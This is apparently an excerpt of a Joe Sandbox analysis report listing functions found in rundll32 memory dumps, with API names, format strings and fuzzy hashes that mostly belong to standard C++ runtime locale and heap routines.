                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateMutex
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1964310414-0
                                                                                                                                                                                • Opcode ID: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
                                                                                                                                                                                • Instruction ID: f659b02594bcf1a426bda83ee387689b4c1de9a7ee5c4c6dd63098f83c4720cb
                                                                                                                                                                                • Opcode Fuzzy Hash: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
                                                                                                                                                                                • Instruction Fuzzy Hash: 8DE12F71408A4D8FE751EF14E895BE6BBF4F768344F60067BE84AC2261DB389245CB86

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 447 1e51e96b4e0-1e51e96b4ee 448 1e51e96b523-1e51e96b52f 447->448 449 1e51e96b4f0-1e51e96b505 447->449 449->448 451 1e51e96b507-1e51e96b51d call 1e51e964ce0 RtlFreeHeap 449->451 451->448
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                • Opcode ID: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
                                                                                                                                                                                • Instruction ID: 664777e487c9bccdd9584a710086ef8c09fbf8c270feaa802643e097b5394b2d
                                                                                                                                                                                • Opcode Fuzzy Hash: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
                                                                                                                                                                                • Instruction Fuzzy Hash: 3BF01230310E088BFB58E7BAECC47A937E3FB5D345B444055A805C6194EF389441D701
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000003.1718143395.000001E51CC60000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51CC60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_3_1e51cc60000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6258ad962565a3180bb006997aefc3c2d41d9dd5a2811c72a17a211375779bb6
                                                                                                                                                                                • Instruction ID: 33141faea4966ae7f299688dd12a6f270148e9ac25587fc1d6792d043db84369
                                                                                                                                                                                • Opcode Fuzzy Hash: 6258ad962565a3180bb006997aefc3c2d41d9dd5a2811c72a17a211375779bb6
                                                                                                                                                                                • Instruction Fuzzy Hash: A901F431219E5A0FE79DE769A8C07E6B6C3F7D835CF5C4065DD18CB286DC26CD814284
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Locale_invoke_watson$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_call_reportfault_getptd_malloc_crt
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1584724053-0
                                                                                                                                                                                • Opcode ID: bb9541adda1de7d3445963b5d25e419d471c8ff25f1e67a4739099756cf48ec5
                                                                                                                                                                                • Instruction ID: 6af159807749311029dcf20cf0a31c15f765b1288bfc8251bf40e4ed5872dea9
                                                                                                                                                                                • Opcode Fuzzy Hash: bb9541adda1de7d3445963b5d25e419d471c8ff25f1e67a4739099756cf48ec5
                                                                                                                                                                                • Instruction Fuzzy Hash: 9931C572768AD446EB569B26D5093ED77D2E789BCCF488225DE4E4F79BDE38C0018700
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _errnofree$_callnewh_calloc_crt_ioterm$EnvironmentExceptionInitializeStringsThrow__crt_calloc_impl_cinit_freeptd_heap_init_initptd_ioinit_lock_malloc_crt_mtinit_setenvpmalloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 712202392-0
                                                                                                                                                                                • Opcode ID: 3899b92c9def8d1737fd4a241c48e478abdd423faa6e3756210bf445b346c25b
                                                                                                                                                                                • Instruction ID: 1fba52d11777476b43bfc55d98d6c90569757a8a4f9379ec2db43ad8865e113a
                                                                                                                                                                                • Opcode Fuzzy Hash: 3899b92c9def8d1737fd4a241c48e478abdd423faa6e3756210bf445b346c25b
                                                                                                                                                                                • Instruction Fuzzy Hash: ED516F30624EC64AFB64B7B5D8957ED23FBEB5434CF584DAEAC05C10D7EA28C98086D1
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4099253644-0
                                                                                                                                                                                • Opcode ID: b4bc968d3c6e0ca3411d4d7c887ffc2f2a0207fe4ca6a95d778c9ae964d27bd5
                                                                                                                                                                                • Instruction ID: be5c3d45c93af1ead45e9274bf5e28ead5a38f98ed3f0fb2119b1fc913231685
                                                                                                                                                                                • Opcode Fuzzy Hash: b4bc968d3c6e0ca3411d4d7c887ffc2f2a0207fe4ca6a95d778c9ae964d27bd5
                                                                                                                                                                                • Instruction Fuzzy Hash: B331C531249ED085FF579B61E8657EC23E3AB84B9CF091729DD1A4A2E7DF2CC8448611
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::ios_base::getloc.LIBCPMTD ref: 000001E51AE02F48
                                                                                                                                                                                  • Part of subcall function 000001E51ADE3F40: std::locale::locale.LIBCPMTD ref: 000001E51ADE3F64
                                                                                                                                                                                  • Part of subcall function 000001E51ADF2EB4: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF2ED5
                                                                                                                                                                                  • Part of subcall function 000001E51ADF2EB4: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF2EFA
                                                                                                                                                                                  • Part of subcall function 000001E51ADF2EB4: std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF2F24
                                                                                                                                                                                  • Part of subcall function 000001E51ADF2EB4: std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF2FCE
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$std::ios_base::getlocstd::locale::locale
                                                                                                                                                                                • String ID: %H : %M$%H : %M : S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm$c
                                                                                                                                                                                • API String ID: 824625536-3998755201
                                                                                                                                                                                • Opcode ID: 9ea7233a1195fdad9958adce2f8bb786a2981300ba8746fa4110a12b4cbdb550
                                                                                                                                                                                • Instruction ID: 53d67a321fec3edf2d78901f37eec5b49f6783060fbea29ae0ae2b961baaf701
                                                                                                                                                                                • Opcode Fuzzy Hash: 9ea7233a1195fdad9958adce2f8bb786a2981300ba8746fa4110a12b4cbdb550
                                                                                                                                                                                • Instruction Fuzzy Hash: DFE18E32608FC687EB668F28E5407EE77E2F78978CF544215EE8917A5ADB38C645C700
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::ios_base::getloc.LIBCPMTD ref: 000001E51AE034A8
                                                                                                                                                                                  • Part of subcall function 000001E51ADE3F40: std::locale::locale.LIBCPMTD ref: 000001E51ADE3F64
                                                                                                                                                                                  • Part of subcall function 000001E51ADEABE0: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADEABF9
                                                                                                                                                                                  • Part of subcall function 000001E51ADEABE0: __int64.LIBCPMTD ref: 000001E51ADEAC12
                                                                                                                                                                                  • Part of subcall function 000001E51ADEABE0: std::locale::_Getfacet.LIBCPMTD ref: 000001E51ADEAC29
                                                                                                                                                                                  • Part of subcall function 000001E51ADEABE0: std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADEACDA
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Lockitstd::_$GetfacetLockit::_Lockit::~___int64std::ios_base::getlocstd::locale::_std::locale::locale
                                                                                                                                                                                • String ID: %H : %M$%H : %M : S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm$c
                                                                                                                                                                                • API String ID: 4021809434-3998755201
                                                                                                                                                                                • Opcode ID: 8e1deff4405f140ca104af93d567ca82f55d7d783d531e69af03a14ea99d4600
                                                                                                                                                                                • Instruction ID: 2ff6ecd070b41ca0ffc248ffd871ee0ed04f52d5f17c02642dc99bb088afd129
                                                                                                                                                                                • Opcode Fuzzy Hash: 8e1deff4405f140ca104af93d567ca82f55d7d783d531e69af03a14ea99d4600
                                                                                                                                                                                • Instruction Fuzzy Hash: 76E15F32608FC686EB668F24E5447EE77E2F78978CF544205EE8947B9ADB38C645C700
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::ios_base::getloc.LIBCPMTD ref: 000001E51AE0BC74
                                                                                                                                                                                  • Part of subcall function 000001E51ADE3F40: std::locale::locale.LIBCPMTD ref: 000001E51ADE3F64
                                                                                                                                                                                  • Part of subcall function 000001E51ADEC674: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADEC695
                                                                                                                                                                                  • Part of subcall function 000001E51ADEC674: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADEC6BA
                                                                                                                                                                                  • Part of subcall function 000001E51ADEC674: std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADEC6E4
                                                                                                                                                                                  • Part of subcall function 000001E51ADEC674: std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADEC78E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$std::ios_base::getlocstd::locale::locale
                                                                                                                                                                                • String ID: %H : %M$%H : %M : S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm$c
                                                                                                                                                                                • API String ID: 824625536-3998755201
                                                                                                                                                                                • Opcode ID: c37271404475d0014721bef1fed1c0e1cecc04706b38c11d20b1fc59747c924a
                                                                                                                                                                                • Instruction ID: 7a7c4b6548e3f95e667319202f22d4f3bdb2eb131e9d6c290fb634cdf4377989
                                                                                                                                                                                • Opcode Fuzzy Hash: c37271404475d0014721bef1fed1c0e1cecc04706b38c11d20b1fc59747c924a
                                                                                                                                                                                • Instruction Fuzzy Hash: E1E17C32608FC586EB668F24E5407ED77E2F795B8CF144205EE8947A9ADB38C655CB00
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 662288457-3145022300
                                                                                                                                                                                • Opcode ID: b569cdc1653f4c7f6180cbb6e0faa1c39ac808a66fab2fc048e17dcba9d08f51
                                                                                                                                                                                • Instruction ID: ef1ce01d84431544c61e48b24e91a3c862e7f9a77a03c55e891a50158dd642da
                                                                                                                                                                                • Opcode Fuzzy Hash: b569cdc1653f4c7f6180cbb6e0faa1c39ac808a66fab2fc048e17dcba9d08f51
                                                                                                                                                                                • Instruction Fuzzy Hash: 5C310E32648F8091EB16DF25E8503DE67E2E794BA8F554322DE69476EBDE38C486C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 662288457-3145022300
                                                                                                                                                                                • Opcode ID: e44b50d4e94eb0d1351846dbd8529780eaeaffd3bd116e536ad6d8b979878f95
                                                                                                                                                                                • Instruction ID: 54c6bc4209b9693de707002d757e24c156e7d91d8b558853ab2dc98e42c0f64d
                                                                                                                                                                                • Opcode Fuzzy Hash: e44b50d4e94eb0d1351846dbd8529780eaeaffd3bd116e536ad6d8b979878f95
                                                                                                                                                                                • Instruction Fuzzy Hash: B0311272208F8091EB16DB65E4507DE67E2F794BA8F584322DE6D476EBDE38C486C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 662288457-3145022300
                                                                                                                                                                                • Opcode ID: ad4db0a7af812267d7f8cad6930e3dc199e4210e7b6ad20d02838aa8ea755007
                                                                                                                                                                                • Instruction ID: 43c76efb6365255fe1b20e1bb04544cea12e26bfad69913d305ebe62f5baeb13
                                                                                                                                                                                • Opcode Fuzzy Hash: ad4db0a7af812267d7f8cad6930e3dc199e4210e7b6ad20d02838aa8ea755007
                                                                                                                                                                                • Instruction Fuzzy Hash: 99311271608F8091FF169B25E8403DE67E2F794BA8F594322DE69476EBDE38C486C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockcollatestd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 4217240666-3145022300
                                                                                                                                                                                • Opcode ID: 4b7540098f8ea2fd8cb3a6c4dc7befb07f8a31645b2c4940871eb245c6e3b5b3
                                                                                                                                                                                • Instruction ID: 6266319702249cfc9912edac9b909395d011743b2e4a413fe2034c0a52a3bf9a
                                                                                                                                                                                • Opcode Fuzzy Hash: 4b7540098f8ea2fd8cb3a6c4dc7befb07f8a31645b2c4940871eb245c6e3b5b3
                                                                                                                                                                                • Instruction Fuzzy Hash: 2B312C32208F8092EB139B65E9403DD77E2EBA4BA8F544322DE59476EBDE34C4868740
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_locknumpunctstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 4059195664-3145022300
                                                                                                                                                                                • Opcode ID: d94e50aa53ccc9d6944cd3aed90cdf3e84a64a3bd5255cb9728456337b3ddaed
                                                                                                                                                                                • Instruction ID: 55cd79c82478ff446f884a3123ead0d047c985b0f9a33e113d50b3a21735d8c4
                                                                                                                                                                                • Opcode Fuzzy Hash: d94e50aa53ccc9d6944cd3aed90cdf3e84a64a3bd5255cb9728456337b3ddaed
                                                                                                                                                                                • Instruction Fuzzy Hash: 4C311F72248F8091EF26DB25E8503DE67E2E794BA8F544322DE59476EBDE78C486C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 662288457-3145022300
                                                                                                                                                                                • Opcode ID: 48616abfac1a981897439173c93a6e5aaf7991275bd66df3e03a16717abd7810
                                                                                                                                                                                • Instruction ID: 5d0acff78c6e3a174cf28a586fe4f6f380ab9fdb896a40c84fad1b878465a0c9
                                                                                                                                                                                • Opcode Fuzzy Hash: 48616abfac1a981897439173c93a6e5aaf7991275bd66df3e03a16717abd7810
                                                                                                                                                                                • Instruction Fuzzy Hash: 3F315231608FC091EB179B25E8403DE67E2F794BA8F554321DE69076EBDE78C886C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockcollatestd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 4217240666-3145022300
                                                                                                                                                                                • Opcode ID: 1ff498fc3fba5fdf49fdedaaaf28a20aa44f259ac781903afc3c6c16cf0d7928
                                                                                                                                                                                • Instruction ID: 02814eb630807eff529af449dbdc90ad42dae87512d308574730c4234eee1486
                                                                                                                                                                                • Opcode Fuzzy Hash: 1ff498fc3fba5fdf49fdedaaaf28a20aa44f259ac781903afc3c6c16cf0d7928
                                                                                                                                                                                • Instruction Fuzzy Hash: 8D310E76208F8091EB169B25E4503DE67E6F794BA8F544322DE59476EFDE38C8468700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockctypestd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 757613215-3145022300
                                                                                                                                                                                • Opcode ID: 27ff36a41daa2afd465fce565ffe5753e683ad286d1df17b1f83c21b9b33a9ce
                                                                                                                                                                                • Instruction ID: d1f630a196ebefa87ded595e76f13871a030a7065632c8fc193c66e1bfa57ac8
                                                                                                                                                                                • Opcode Fuzzy Hash: 27ff36a41daa2afd465fce565ffe5753e683ad286d1df17b1f83c21b9b33a9ce
                                                                                                                                                                                • Instruction Fuzzy Hash: 13313232218F8091EB16DB66E4503DE67E2F794BA8F544322DE5A476EBDF38C546CB00
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 662288457-3145022300
                                                                                                                                                                                • Opcode ID: 5a55c19257780c8c169a156cca45b48a9cb7959a6ebe7d38ac67adaa113ab4e8
                                                                                                                                                                                • Instruction ID: a238f66860fb1a6dd20de5332a8c88553e4581fdf4740c66981fddf103b1c2c1
                                                                                                                                                                                • Opcode Fuzzy Hash: 5a55c19257780c8c169a156cca45b48a9cb7959a6ebe7d38ac67adaa113ab4e8
                                                                                                                                                                                • Instruction Fuzzy Hash: EC313E32708F8082EB179B25E5407DD77E2E794BA8F544322DE69476EBDE38C8858710
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 662288457-3145022300
                                                                                                                                                                                • Opcode ID: c69e9b5502f2b5cb16499cf93693c14af8bc71d40f19607121fcaa26e48801a2
                                                                                                                                                                                • Instruction ID: 6061772ef83c2a1733d89a7a25dda144811e7dc19a1bf7b25b06873398df8d68
                                                                                                                                                                                • Opcode Fuzzy Hash: c69e9b5502f2b5cb16499cf93693c14af8bc71d40f19607121fcaa26e48801a2
                                                                                                                                                                                • Instruction Fuzzy Hash: 8C311D32208E8081EB179B65E8403DE67E2E794BA8F954322DE69476EBDE78C446C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 662288457-3145022300
                                                                                                                                                                                • Opcode ID: ce52fca3fe3199b9ca64d09fb7b68cda433c6417c830918da4d940205a12b32f
                                                                                                                                                                                • Instruction ID: ebb680ea70ff3bcc75925b0f1d4edadca1d0ea3a9f9f1dae6dd3dfe495d09aef
                                                                                                                                                                                • Opcode Fuzzy Hash: ce52fca3fe3199b9ca64d09fb7b68cda433c6417c830918da4d940205a12b32f
                                                                                                                                                                                • Instruction Fuzzy Hash: CE313232208FC091EB179B29E4403EE67E2E794BA8F545322DE69476EBDE34C4868740
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 662288457-3145022300
                                                                                                                                                                                • Opcode ID: e92ebb4505384e37149a9af64b0ed7b997fd3b62a18224f75f4565cc40b02c60
